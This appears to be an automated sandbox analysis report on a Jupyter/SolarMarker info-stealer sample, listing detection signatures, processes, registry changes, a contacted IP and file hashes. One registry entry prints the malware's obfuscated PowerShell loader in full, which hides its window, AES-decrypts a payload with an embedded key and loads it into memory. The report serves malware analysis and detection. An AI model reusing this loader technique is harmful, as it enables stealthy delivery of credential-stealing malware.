Analysis Overview
SHA256
6828ce39fa7de6c4efabe1c7b6d19213c56d094c12731ff035bd114408e52263
Threat Level: Known bad
The file 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.7z was found to be: Known bad.
Malicious Activity Summary
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Jupyter, SolarMarker
Jupyter family
Blocklisted process makes network request
Drops startup file
Program crash
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2022-06-13 00:03
Signatures
Jupyter family
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-13 00:01
Reported
2022-06-13 00:09
Platform
win10-20220414-en
Max time kernel
307s
Max time network
311s
Command Line
Signatures
Jupyter, SolarMarker
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAkseLakVWShCAFBIqeAz.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil\ = "jplfkwrqxarlkfumjaublhevlrnzqaj" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SuzlSBEybt+4l4GorDHHnbdEjW5soZLDzFJs4SVeMJ0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\SuMZpQaKehWXVEkKQuHyLIZz\\ybWylzucNKVPS.rhyCuOqCZmgcLvgvIl'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[F26y7_MVUpgqQtmoaaDj.RJt6RD8GBp9hWlC5Gbu11nR9257QVV1qfUfdMGc0QJhbcaHbl95wlIt0RvEZQXgar4zx]::UupaQTjrkgVL7jhlnNjwwOfoiDFmEk6eD5fN96jMuScriboS9_bVDY8MwON3Lmr_VqfUsde9ih0S5aB1amydC9k();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe
"C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp" "c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3728 -s 936
Network
| Country | Destination | Domain | Proto |
| US | 20.42.65.90:443 | tcp | |
| RO | 37.120.247.120:80 | 37.120.247.120 | tcp |
Files
memory/3728-117-0x00000000005D0000-0x00000000015D0000-memory.dmp
memory/1016-118-0x0000000000000000-mapping.dmp
memory/1016-123-0x000001594BA40000-0x000001594BA62000-memory.dmp
memory/1016-142-0x0000015964600000-0x000001596463C000-memory.dmp
memory/1016-153-0x00000159646C0000-0x0000015964736000-memory.dmp
memory/3776-230-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline
| MD5 | 99bcd1c19fb29827fb47c00f2f10c264 |
| SHA1 | 93d6c983b6938564a00519eab58da5fa72dc13f4 |
| SHA256 | 8e23f2c03d3ab8f70e1b9c083bfd749219e2327a67efb3c0edd5f15f10df12e9 |
| SHA512 | afdf1f6c0c711d6dcabb35e00c579e83a696fa25c538e07342ba3fb2deb84680e80e1f43ace3f6b6ed1b38694ed85040777c36a673fc1d22c9762fe0a45867cf |
\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.0.cs
| MD5 | 2f9b4948ac0b26204994e246094a9f5d |
| SHA1 | 9870e53ad61eba593a2074d2a30202f7e3df09f7 |
| SHA256 | def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776 |
| SHA512 | ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1 |
memory/160-233-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP
| MD5 | f75144a068d98ca775e45b05a7609d9f |
| SHA1 | 5af5a7eb16553a66f6013362b439b52be4a80b5a |
| SHA256 | 0399de1e3b7746572693e6f2161e8a31e14608b29304240cf0b967b94b3b45de |
| SHA512 | 9562092f6ee4185d154192424d63bc2a5675f458ce48dd3042075aa85a1af1ea6ab0397a0720ccbeb49516029ec07b7e5d0b0d02ed434fe0dc63928f52f25bda |
C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp
| MD5 | 0b2c9f1a68309a879e2fa3eb0ed42191 |
| SHA1 | f108a9b65bd91d95551f1bbd5cde2d2596364a05 |
| SHA256 | 6cf0e222a3be64aa34fe63baffa1ffba4e0818d2e74a83f74f9d4c7d8030ace3 |
| SHA512 | 69bcb1327f20abf5b8f198fb84a8e9627953e1f2ad95e2ea765b503e54f4630557f14fc851a5b9d65d163e0db91b4770165025a780e4e850c049b2d584c27b45 |
C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.dll
| MD5 | 33d01500a8b7aae1f1f9bf7bb0a84ff1 |
| SHA1 | 5ba1575702f2540b0bbf45355ce1c58baf8d2199 |
| SHA256 | b3f5bd1696f11e4409f0c8686b3ef5c66fe58008b9267052cec1563329c29db1 |
| SHA512 | 3f475092c3aa0e776a6532eae919a4205347670bff95d73e5c6960d32009a35e885fb719531ae973c443b200b704608102a0c65f6a372f7e10d9430089ebbca4 |
memory/1016-237-0x00000159642A0000-0x00000159642A8000-memory.dmp
memory/3984-326-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 2143b379fed61ab5450bab1a751798ce |
| SHA1 | 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e |
| SHA256 | a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81 |
| SHA512 | 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa |
memory/1016-376-0x0000015964740000-0x00000159647EC000-memory.dmp